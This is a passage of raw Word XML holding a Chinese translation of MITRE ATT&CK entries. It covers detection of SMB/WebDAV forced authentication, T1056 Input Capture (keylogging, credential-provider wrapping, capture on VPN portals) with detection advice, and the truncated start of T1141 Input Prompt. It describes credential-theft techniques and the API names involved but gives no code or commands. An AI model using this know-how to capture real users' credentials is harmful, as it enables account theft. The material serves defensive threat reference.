      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C28DE90" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>139,445</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>137</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以及尝试将网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出到未知外部系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>流量。</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2A55">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果检测到尝试，则调查端点数据源以查找根本原因。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EF4095" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00F50817">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50817">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.LNK</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50817">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50817">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.SCF</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50817">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或系统上以及虚拟环境中包含指向外部网络资源的任何其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00F50817">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的创建和修改，因为这些文件可用于在呈现文件时收集凭据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D8126" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="0096095B" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入捕捉</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="004642C2" w14:paraId="0CA5FCBD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46A073A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004642C2">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>T1056</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1481E09B" w14:textId="4DA27D47" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004642C2">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>采集</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5592555A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004642C2">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E13CA1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004642C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>所需</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>权限：管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00DFCBA7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004642C2">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>，内核驱动</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>程序</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24946D02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004642C2">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId152" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="004642C2">
                <w:t>CAPEC-569</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="6D26A710" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004642C2">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>John Lambert</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>Microsoft Threat Intelligence Center</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE40523" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004642C2">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="004642C2">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56DD9D39" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EE58740" w14:textId="0D6DB5E7" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会通过捕捉用户输入的</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:t>方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:t>包括键盘记录以及用户输入字段拦截</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，来获取有效账号以及信息收集需要的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。键盘记录是时下最流行的输入捕捉方式，它包括多种截取键盘输入的方法。但也存在基于特定目的的信息定位方法，例如执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示或包装</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1682592D" w14:textId="03C3A0D9" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出尝试无效时，可能会使用键盘记录来给</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:t>新访问机会</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但攻击者在机会出现之前需要在系统上保持被动状态一段时间。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A3CC4C" w14:textId="746EAAC5" w:rsidR="000F2665" w:rsidRPr="00872AC7" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还可能会在面向外部的门户（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录页面）上安装代码来捕捉和传输尝试登录该服务的用户的</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:t>可能会在入侵后使用这种</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入捕捉技术变体，将合法管理员级访问作为通过外部远程服务和有效账号来保持网络访问的备份措施，或者作为利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:t>面向外部</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:t>服务初始入侵的一部分</w:t>
      </w:r>
      <w:r w:rsidRPr="00872AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E134E3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B6A190" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2660D486" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B331A9" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC5EFE5" w14:textId="2ADF591E" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键盘记录程序可以采用多种形式，可能包括修改注册表和安装驱动程序，设置</w:t>
      </w:r>
      <w:r w:rsidR="008069DA">
        <w:t>Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或轮询来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拦截键盘输入。</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常常调用的</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包括</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SetWindowsHook</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetKeyState</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GetAsyncKeyState</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。监控注册表和文件系统中的此类更改并检测驱动程序安装，还要查看常见的键盘记录</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用。仅仅是</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用并不能表示有键盘记录，但是</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用可能会提供行为数据。这些</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>数据与</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他信息（例如，写入磁盘的新文件和异常进程）结合使用时就很有用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23910E84" w14:textId="3E081615" w:rsidR="000F2665" w:rsidRPr="004642C2" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控注册表来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加自定义</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供程序的</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>情况</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。检测到攻击者正在使用已入侵的有效账号可能有助于获取攻击者使用</w:t>
      </w:r>
      <w:r w:rsidRPr="004642C2">
        <w:t>新技术来拦截用户输入的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6AE34" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62C36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入提示</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3"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4457BCF8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9623" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42B5C8F9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> T1141</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52EBC841" w14:textId="1F82AAB8" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A6E509D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35175933" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BC5BBEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程监控，进程命令行参数，用户接口，</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PowerShell</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC6D74D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="004779E1" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:lastRenderedPageBreak/>
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t>: Matthew Molyett, @s1air</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263E6FE7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="004779E1">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="004779E1">
              <w:t xml:space="preserve"> 2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74F95DF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D95DD51" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF7B52" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00AF7B52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当执行的程序需要比当前用户上下文中存在的权限更</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>高</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7B52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，操作系统通常会提示用户输入正确的凭据以授权该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限的提升以完成该</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF7B52">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="004779E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
